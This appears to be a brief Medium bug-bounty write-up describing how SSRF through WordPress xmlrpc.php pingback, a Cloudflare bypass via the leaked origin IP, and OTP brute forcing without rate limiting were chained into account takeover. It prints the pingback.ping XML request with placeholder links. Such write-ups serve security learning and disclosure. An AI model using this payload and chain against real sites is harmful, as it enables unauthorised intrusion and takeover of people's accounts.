Tale of 3 vulnerabilities to account takeover!

https://github.com/projectdiscovery/subfinder
pingback.ping method allowed
<?xml version=”1.0″ encoding=”UTF-8″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>[Burp collaborator link]</string></value>
</param>
<param>
<value><string>[Any valid blog post linl]</string></value>
</param>
</params>
</methodCall>
  1. I found SSRF on the blog page by exploiting xmlrpc.php to get the origin server’s IP,
  2. Used the server’s IP to bypass Cloudflare by directly reaching to the origin server and
  3. Brute forced the OTP to tookover victim’s account (as “rate limiting” wasn’t set at the server side)

--

--

--

Security Engineer @Microsoft | DevSecOps | Speaker | Breaking stuff to learn | Featured in Forbes, BBC| Acknowledged by Google, NASA, Yahoo, UN etc

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Cyber Security Academy/SUCSS/Career Networking/Internship event

How to set up a Polygon wallet on Metamask (and add wrapped-ETH)

Log4J VULNERABILITY CRUX

Mainstream banking shows unreliability in Australian cyber stumble

The Identity Crisis in Cybersecurity

Barcode Generator Softwares for fake documents

Privacy Compliance and its significance

{UPDATE} Guess The Football Team!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Avinash Jain (@logicbomb)

Avinash Jain (@logicbomb)

Security Engineer @Microsoft | DevSecOps | Speaker | Breaking stuff to learn | Featured in Forbes, BBC| Acknowledged by Google, NASA, Yahoo, UN etc

More from Medium

How I Made +$16,500 Hacking CDN Caching Servers — Part 3

XSS - The LocalStorage Robbery

XSS Filter Evasion + IDOR

Top 10 API Bugs — Where To Find Them